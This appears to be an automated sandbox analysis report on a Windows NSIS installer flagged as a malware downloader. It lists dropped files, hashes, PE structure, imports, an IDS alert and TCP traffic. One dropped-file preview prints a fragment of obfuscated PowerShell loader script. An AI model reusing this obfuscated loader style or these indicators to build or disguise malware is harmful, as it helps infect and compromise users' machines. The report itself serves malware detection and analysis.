C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gyxw4lk4.hi0.ps1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_naf1qdna.zac.psm1

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Bankrveri.Und

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	348907
Entropy (8bit):	7.64923648165635
Encrypted:	false
SSDEEP:	6144:JhtZdbciFRH/0Mx7fRlSiK32RoFqpOXNBhknlKcwoMFW0wN:NjxF5xrRlFK32R0zm5woMFWH
MD5:	000C4C2148C711E5D3CBEED4144C6F55
SHA1:	E35927390A543BEE257AE0009701C57FF6704E55
SHA-256:	8E75A4461FDBC1386345F6F9CCD0984FBB1799B92033F902B2F43EB6421B9E7E
SHA-512:	613BB7929D5BEDF7A12C41553AD87B955C5EC6862E15DB03E776DC55B396A7D25CDA6E5F40319DE8896D108D1521AD4CC1D070ADEA91F2E4DFFE79ECBB5E654B
Malicious:	false
Preview:	...................\|.....555..##.c.-.........e.............]].:::::::...mmm..................................^^.................HHHH.......FFFF.III....ff.........................TT....UU..nn..ssssss.............00000..a........I...--..'.??....~........m...RRR.!!..44.......*.00................((.6.............j..............-..............##.4.9.MM..........}}}.........=.............D............................::..mmmm.....jj.......a.............mm.........y.....................................................z......ee.9999999999.......................???...........I......./....................RRRR..z.....................................".((.........................@..................s..qqqqqq.;..@..............oooooo.tt....S.GGGG..a......c...............NN..l...........w.MM...YY.....................D..fffffff.\.....................88.....aa...PPP.......q.....Y.g...........................2.....>>........ee............[[[. .1...```...............T.................+++..GG............c.

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Stumblebum.uns

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	389321
Entropy (8bit):	1.2441456788113954
Encrypted:	false
SSDEEP:	1536:FeL5BK5C2PeeejgqyaJ5vizEyLZ/5DKMdt/v:ALXYcjBjJRioyLZ/vP
MD5:	89E3C9CE687BCCD3DD422E9CF78E80E7
SHA1:	007C57BDF5F5E6C0E5B711EBC7BABD673405868D
SHA-256:	51F91F8B04620D371417A6A74162ABD8B690909C544F320338B874F3DDAC4BC2
SHA-512:	2245F6FF3D25FF4142C8C2FB716C775F16592E33909EF9CBD61D2B4AB9891224D45AA58DE3861606DE97604BDD91C78F05BFEFA9A5E80F3272AEBEA6023B804D
Malicious:	false
Preview:	....O................................................<...7.K.......................\...........................................$............M......................................................................................................~...................q................................................................................w..............r...........................a...........................%......................l.......................................4.........+.............................................._.............................................................@..................................................................................#.....................Q....................M....................X....e..................lC.........,..............................a........C....1..............................[...................q...............................B.............................,.........U...................................................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\leverancernes.hor

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	353789
Entropy (8bit):	1.2644758643056393
Encrypted:	false
SSDEEP:	768:13gkCATl4BkZKo0fUjjxFBEdCYm58mNplGQUxbgNcDr7A78Q0Ej8RTTzVs2zWjtq:d0AHnNm/pdYlHvnAYv
MD5:	1389593C3437BAED25D4CD0C926898FF
SHA1:	532BC681AF49B0BEAD471EBBA0AB0191E78A4E02
SHA-256:	9A8D9ED596327751DB6960002DD258066E82BE64080C737D381708446BEB519E
SHA-512:	C6DB96BAEA286B7281B1E068B78D5076F4EAE2DBEB01CAA43C59C29F1839F2328FB59ACE190EA8267790D726706E0F0234876F6ED665818EA0D1AE252DB18C57
Malicious:	false
Preview:	...............6........................R.N.......................................................^.......................................w.......................R..................................k.......................~.................U...................... s..................4........V............................<............h...........U...............................-...................................................e.................@.......-................................................[...............=...........................................N.....w..^.5.............+.............................................................................*...........................c...........................b.......................f............>....................+...................0_........................................@........^........._.........W........u............................................b...$...........}.........................9.~...........L.................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	554816
Entropy (8bit):	7.967733280499974
Encrypted:	false
SSDEEP:	12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
MD5:	54327A2F6C75BB2C549A5A98A462A588
SHA1:	F65473FA075BEF32B55445D84CB8BFA4DA48AC79
SHA-256:	C3463021D3069AE7AAD460707A950EB7B427A65C87F3D8E201B59CEBB886A1B7
SHA-512:	88595FA0AF8AC0211145787CE0D0D3AFDFB396EDFCFCBAB16D4714FBFB1077A8EB8DF5EC6BD9AAEFD916611363DD7791C62CFABA24A571BD4279FFB93BB73866
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 74%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....f.R.................b..........)2............@..................................................................................... ............................................................................................................text...l`.......b.................. ..`.rdata..`............f..............@..@.data................\|..............@....ndata.......P...........................rsrc... ...........................@..@................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Tilmeldingsprocedurens\yMXFgPOdf2.exe:Zone.Identifier

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	true
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\Touchlvr.Pap

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	Unicode text, UTF-8 text, with very long lines (4175), with CRLF, LF line terminators
Category:	dropped
Size (bytes):	72419
Entropy (8bit):	5.202406314479258
Encrypted:	false
SSDEEP:	1536:5IvdS5j9pnCoq0dne+ScDJCnHEQNH48jf3Wv+DTUPStt+LLAfD:GvwDpnf1J4nHtYuf86PN7
MD5:	5F7683B5FC367FB972FDAF8E80B65209
SHA1:	A13FF69F57AF2E5AB471F513C8188437D6D2EE6C
SHA-256:	4DD50C49D0122FC5E02AC8806E6F6ABACFA8A5F9E868355824665DD76FAD2959
SHA-512:	D7B54E3E42C8EC494C6FDB69A4C7FB4D1C2A86229F5BDE05EF17A97BA5134AD5A063080E9638FF2C44FB730A2C8ED42A34268F5C8C61C86E15E87D272C03C621
Malicious:	false
Preview:	$Radikandernes=$Signifikansniveauerneslindtarmsoperationer;.....<#Irradiates Inoculum Cacodaemon Endosperm Etiopisk Hoejreparenteser #>..<#saccharometres Abusious Dragers Ufredeligheds Gyngende Historial #>..<#Pseudoparallel Musicerendes Radikalisere Zygodont Smedesvenden #>..<#Svedkirtels Spinomuscular fuga Bygningattester Sculptitory Phthiriasis Nstmest #>..<#Uroliths Rkerivalen Epileptically Textilist transferrins #>..<#Wooziness cupeller Undoings Opretningernes Fordomsfries monsuners #>...$Fyrrekoglerne = @'.Uri ome. Normsy$AsherytRGravernt Fstemne Panuelbskdefral sebaroAccrescmJ.wliessTilsendtanom,idr Pindsve issekrtSknkeprsHematin=Superpl$TwirlieJ.seudoptP intert S,ilemeDaduchusAarsungtTresindu ekanise UndularEnkemannAfst esesekretisFemkmp ;wightaf.Embr onfSucceeduLucratin BaglygcUr nstitramseybiSor.imeoK mmerhnPuff.et OverfesA Hovedbs FunktikStraahaa fran,urSliwe ciAcumblesFlorsuk Phrasab(Indiane$BlendenFB vislirSapiostdIndsigtsNyisma.eBotan zlLocutorsBoulevalRacallaoSuccussv

C:\Users\user\AppData\Roaming\postarmistice\monospermy\brevbombe\kyklopens.omk

Process:	C:\Users\user\Desktop\yMXFgPOdf2.exe
File Type:	data
Category:	dropped
Size (bytes):	123589
Entropy (8bit):	1.2483073164392806
Encrypted:	false
SSDEEP:	768:m1KHXfm5rQX+j8EqstsDz8z/nFdKur6NmZSqC+uioeefzpB:6KuTUst73XQTdFB
MD5:	C8E4A04215D6E7A2A46B2ECF556E8034
SHA1:	EC0CF162AFCCFC3EE67BEEF117DB801EAE87095A
SHA-256:	AB50D30AFE30A2B1E868A29CA803681B1A5C0182A1BA8A68E1F7F41C241CFAC2
SHA-512:	8FA144195FEDEB75D2E874AE4A35E667E366F805BE91D0AF79309FAEEA2857668FBFC4EC31F2CE85FF40BC197802F0E2EBEAF8C07AF12D4782A5B8A09792558E
Malicious:	false
Preview:	.....".............................................................................................................0...........2...............'..[.......[..............B....................'......'.q............2...............".............h..................&.................J...........................$@.....................W............................................h...........................................!...........k...................2..............%..............................................U....................(......................................................N.......................................=.........................}...................................W......T......................\|....................................................................................-..................................................................#....................................................................<...............'.................~........n........P...

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.967733280499974
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	yMXFgPOdf2.exe
File size:	554'816 bytes
MD5:	54327a2f6c75bb2c549a5a98a462a588
SHA1:	f65473fa075bef32b55445d84cb8bfa4da48ac79
SHA256:	c3463021d3069ae7aad460707a950eb7b427a65c87f3d8e201b59cebb886a1b7
SHA512:	88595fa0af8ac0211145787ce0d0d3afdfb396edfcfcbab16d4714fbfb1077a8eb8df5ec6bd9aaefd916611363dd7791c62cfaba24a571bd4279ffb93bb73866
SSDEEP:	12288:aICfPgs7diA6gdZiygrNIVYAHHjMIyoS/B3FYA1YU:MZdL6AMxI+Aopz/lJv
TLSH:	A3C4231241A3D227D6B20B32257375438A55D13CB42A674A0BD4A52FFF1FB877A2B317
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.ju.ju.j..ujw.ju.+j..j..wjd.j!..j..j..,jt.jRichu.*j........PE..L....f.R.................b..........)2............@

File Icon


Icon Hash:	3d2e0f95332b3399

Static PE Info

General

Entrypoint:	0x403229
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	TERMINAL_SERVER_AWARE
Time Stamp:	0x52BA66B8 [Wed Dec 25 05:01:44 2013 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	7ed0d71376e55d58ab36dc7d3ffda898

Entrypoint Preview

Instruction
sub esp, 000002D4h
push ebx
push ebp
push esi
push edi
push 00000020h
xor ebp, ebp
pop esi
mov dword ptr [esp+14h], ebp
mov dword ptr [esp+10h], 0040A2D8h
mov dword ptr [esp+1Ch], ebp
call dword ptr [00408034h]
push 00008001h
call dword ptr [00408134h]
push ebp
call dword ptr [004082ACh]
push 00000008h
mov dword ptr [00434F58h], eax
call 00007F76F8BE0904h
mov dword ptr [00434EA4h], eax
push ebp
lea eax, dword ptr [esp+34h]
push 000002B4h
push eax
push ebp
push 0042B1B8h
call dword ptr [0040817Ch]
push 0040A2C0h
push 00433EA0h
call 00007F76F8BE056Fh
call dword ptr [00408138h]
mov ebx, 0043F000h
push eax
push ebx
call 00007F76F8BE055Dh
push ebp
call dword ptr [0040810Ch]
cmp word ptr [0043F000h], 0022h
mov dword ptr [00434EA0h], eax
mov eax, ebx
jne 00007F76F8BDDA6Ah
push 00000022h
mov eax, 0043F002h
pop esi
push esi
push eax
call 00007F76F8BDFFAEh
push eax
call dword ptr [00408240h]
mov dword ptr [esp+18h], eax
jmp 00007F76F8BDDB2Eh
push 00000020h
pop edx
cmp cx, dx
jne 00007F76F8BDDA69h
inc eax
inc eax
cmp word ptr [eax], dx
je 00007F76F8BDDA5Bh
add word ptr [eax], 0000h

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x85a0	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x4f000	0xe20	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2b8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x606c	0x6200	6b261bd7f45c2df7de2d0134c84421b7	False	0.6672114158163265	data	6.457067985385169	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1460	0x1600	0aa2dc336f7337ed3785ee2afeacae36	False	0.4211647727272727	data	4.945964880166059	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2af98	0x600	326f796323fdc724ea91090eafbe9bdc	False	0.4856770833333333	data	3.795352750027872	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x1a000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x4f000	0xe20	0x1000	e5e5702e0860c5a23b57f4e4a3a48c73	False	0.39404296875	data	3.933821454129907	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x4f208	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 640	English	United States	0.42473118279569894
RT_DIALOG	0x4f4f0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x4f5f0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x4f710	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x4f7d8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x4f838	0x14	data	English	United States	1.2
RT_VERSION	0x4f850	0x2c8	data	English	United States	0.49297752808988765
RT_MANIFEST	0x4fb18	0x305	XML 1.0 document, ASCII text, with very long lines (773), with no line terminators	English	United States	0.5614489003880984

Imports

DLL	Import
KERNEL32.dll	CompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, SetFileAttributesW, ExpandEnvironmentStringsW, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, SetErrorMode, GetCommandLineW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
USER32.dll	EndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
GDI32.dll	SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
SHELL32.dll	SHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
ADVAPI32.dll	RegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
COMCTL32.dll	ImageList_Create, ImageList_AddMasked, ImageList_Destroy
ole32.dll	CoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T04:34:51.570511+0100	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.5	51645	142.250.181.238	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 04:33:58.967976093 CET	51399	53	192.168.2.5	1.1.1.1
Jan 11, 2025 04:33:58.973248959 CET	53	51399	1.1.1.1	192.168.2.5
Jan 11, 2025 04:33:58.973325968 CET	51399	53	192.168.2.5	1.1.1.1
Jan 11, 2025 04:33:58.983350992 CET	53	51399	1.1.1.1	192.168.2.5
Jan 11, 2025 04:33:59.422765017 CET	51399	53	192.168.2.5	1.1.1.1
Jan 11, 2025 04:33:59.427702904 CET	53	51399	1.1.1.1	192.168.2.5
Jan 11, 2025 04:33:59.427794933 CET	51399	53	192.168.2.5	1.1.1.1
Jan 11, 2025 04:34:50.537317991 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:50.537373066 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:50.537697077 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:50.557183981 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:50.557214975 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.191608906 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.191754103 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.192429066 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.192482948 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.257276058 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.257297039 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.257641077 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.257695913 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.261622906 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.303337097 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.570468903 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.570769072 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.570786953 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.570849895 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.571662903 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.571702957 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.571708918 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.571759939 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.575717926 CET	51645	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:34:51.575742960 CET	443	51645	142.250.181.238	192.168.2.5
Jan 11, 2025 04:34:51.628774881 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:51.628817081 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:51.628869057 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:51.629318953 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:51.629333973 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.281543016 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.281718969 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.291763067 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.291778088 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.292036057 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.293811083 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.295758009 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.339324951 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.724049091 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.724103928 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.724163055 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:34:52.724189997 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.724314928 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.756926060 CET	51646	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:34:52.756952047 CET	443	51646	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:02.859330893 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:02.859380007 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:02.859508991 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:02.860045910 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:02.860064983 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.506481886 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.506633997 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.507392883 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.507405043 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.507546902 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.507553101 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.893954992 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.894067049 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.894079924 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.894145966 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.894671917 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.894712925 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.894728899 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.894826889 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.897342920 CET	51647	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:03.897372961 CET	443	51647	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:03.904830933 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:03.904875040 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:03.904951096 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:03.905145884 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:03.905163050 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.539433002 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.539520025 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.540072918 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.540081978 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.540230989 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.540235043 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.969619036 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.969691992 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.969692945 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.969716072 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.969733953 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.969763041 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:04.969767094 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.969814062 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.970717907 CET	51648	443	192.168.2.5	142.250.185.225
Jan 11, 2025 04:35:04.970737934 CET	443	51648	142.250.185.225	192.168.2.5
Jan 11, 2025 04:35:14.985678911 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:14.985711098 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:14.985852957 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:14.986134052 CET	51649	443	192.168.2.5	142.250.181.238
Jan 11, 2025 04:35:14.986150026 CET	443	51649	142.250.181.238	192.168.2.5
Jan 11, 2025 04:35:15.614643097 CET	443	51649	142.250.181.238	192.168.2.5
